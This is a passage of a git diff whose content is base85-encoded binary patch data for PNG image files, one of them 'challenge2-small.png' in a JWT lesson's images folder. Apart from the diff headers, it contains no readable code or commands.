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

literal 0
HcmV?d00001

diff --git a/src/main/resources/lessons/jwt/images/challenge2-small.png b/src/main/resources/lessons/jwt/images/challenge2-small.png
new file mode 100644
index 0000000000000000000000000000000000000000..777b5a093721aa430a9f751a37498078511c577a
GIT binary patch
literal 34371
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
